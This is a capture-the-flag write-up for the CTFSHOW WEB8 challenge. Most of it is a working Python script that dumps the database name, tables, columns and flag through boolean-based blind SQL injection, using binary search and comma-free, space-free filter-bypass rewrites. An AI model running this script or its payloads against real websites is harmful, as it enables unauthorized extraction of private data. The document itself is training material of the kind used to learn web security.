[SQL blind injection] CTFSHOW WEB8 (dumping data quickly with binary search)

Some additional filter-bypass tricks (both rewrites get rid of the comma):
1. Rewrite limit 0,1 as limit 1 offset 0.
2. Rewrite substr(string,1,1) as substr(string from 1 for 1).

This challenge is a boolean-based blind injection; for the reasoning behind that, see the other writeups, I won't repeat it here and only want to record my script.
The four payloads respectively query the database name, the table names, the column names and finally dump the flag field; uncomment the one you want and play with it,
then replace the first part of the url with the url of your own challenge instance.

import requests

# Replace the host with your own instance. The injection point is the id parameter:
# "-1" makes the original WHERE clause false, so whether the poem is rendered
# depends only on the condition we append after "or" (/**/ stands in for spaces).
url = "http://a448d26a-b594-47a1-b3e0-fddbe1d869ba.chall.ctf.show/?id=-1/**/or/**/"

result = ''
i = 0

while True:
    i = i + 1
    # Binary search the ASCII value of the i-th character over [32, 127).
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # Stage 1: database name. Note that a trailing "#" is treated by requests as a
        # URL fragment and never sent; use %23 if you need a comment (the "or" payloads don't).
        # payload = f'ascii(substr(database()/**/from/**/{i}/**/for/**/1))>{mid}#'
        # Stage 2: table names of the current database.
        # payload = f'ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database()))/**/from/**/{i}/**/for/**/1))>{mid}'
        # Stage 3: column names of the flag table.
        # payload = f'ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name="flag"))/**/from/**/{i}/**/for/**/1))>{mid}'
        # Stage 4: the flag itself.
        payload = f'ascii(substr((select/**/(flag)from(flag))/**/from/**/{i}/**/for/**/1))>{mid}'
        r = requests.get(url + payload)
        # The poem body only appears when the injected condition is true.
        if "By Rudyard Kipling" in r.text:
            head = mid + 1
        else:
            tail = mid

    # Past the end of the string substr() is empty and ascii('') is 0, so every
    # ">mid" test fails and the search bottoms out at 32: we are done.
    # Caveat: a real space (ASCII 32) in the data stops the loop too; lower head to 0
    # if the value you are dumping may contain spaces.
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)
